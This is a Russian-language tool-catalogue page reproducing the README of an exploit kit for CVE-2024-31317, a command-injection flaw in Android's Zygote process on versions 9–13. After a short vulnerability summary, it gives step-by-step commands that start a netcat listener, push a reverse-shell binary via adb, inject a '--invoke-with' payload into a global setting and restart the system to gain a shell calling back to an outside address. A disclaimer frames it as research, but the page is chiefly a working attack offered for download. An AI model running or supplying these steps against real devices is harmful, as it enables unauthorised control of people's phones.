Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-31317-Deployer — CVE-2024-31317 Инструмент исследования и развертывания уязвимости внедрения команд в Android Zygote | Фреймворк эксплуатации уязвимостей Android 9-13 | Kitploit
Инструменты/GitHubGitHub/fcy10012/cve-2024-31317-deployer
Безопасность AndroidАнализ уязвимостейЭксплуатацияКомандование и УправлениеОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubfcy10012/cve-2024-31317-deployer

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-31317-Deployer

CVE-2024-31317 Инструмент исследования и развертывания уязвимости внедрения команд в Android Zygote | Фреймворк эксплуатации уязвимостей Android 9-13

Репозиторий
6228 месяцев назадЕщё не проверено

CVE-2024-31317 Deployer

License Android Status

🔒 Заявление о безопасности исследования

Этот проект предназначен исключительно для целей безопасности и образования. Использование этого инструмента для несанкционированного тестирования незаконно. Автор не несет ответственности за любое злоупотребление или ущерб.

📋 Обзор

CVE-2024-31317 — это критическая уязвимость безопасности, затрагивающая устройства Android с версиями от 9 до 13, которая позволяет приложениям с разрешением WRITE_SECURE_SETTINGS получить привилегии системного уровня через внедрение команд.

Этот проект предоставляет подробный технический анализ уязвимости, код доказательства концепции и инструменты для автоматизации развертывания.

✨ Основные возможности

  • 📱 Поддержка всех версий Android 9–13
  • 🛠️ Скрипты автоматизации развертывания
  • 🔄 Обратное подключение оболочки
  • 📊 Подробная техническая документация
  • 🎯 Модульная архитектура

🐛 Детали уязвимости

  • CVE ID: CVE-2024-31317
  • Тип уязвимости: Внедрение команд
  • Серьёзность: Высокая (High)
  • Оценка CVSS: 7.8
  • Затронутый компонент: Процесс Zygote в Android
  • Статус исправления: Исправлено в патче безопасности Android за июнь 2024 г.

🎯 Область воздействия

Затронутые версии

  • ✅ Android 9–13

Незатронутые версии

  • ❌ Android 14+ (исправлено)
  • ❌ Устройства с установленным патчем безопасности от июня 2024 года или новее

📁 Структура проекта

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 Быстрый старт

1. Клонирование репозитория

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Компиляция полезной нагрузки

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. Развертывание

root@kitploit:~
# Запуск слушателя
nc -lvnp 4444

# Отправка и выполнение
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# Внедрение полезной нагрузки
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# Триггер уязвимости
adb shell stop && adb shell start

📚 Документация

  • Глубокий технический анализ
  • Инструкция по использованию полезной нагрузки
  • Полное руководство по использованию

⚠️ Отказ от ответственности

Этот проект предназначен исключительно для целей безопасности и образования. Используя этот инструмент, вы соглашаетесь:

  • соблюдать все применимые законы и правила
  • использовать его только для законных исследований безопасности
  • нести полную ответственность за свои действия

📜 Лицензия

Этот проект лицензирован под лицензией MIT — подробнее см. в файле LICENSE

👨‍💻 Автор

fcy10012 — GitHub

🙏 Благодарности

Справочный проект: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ Если этот проект был вам полезен, поставьте ему звезду!

Скачать инструмент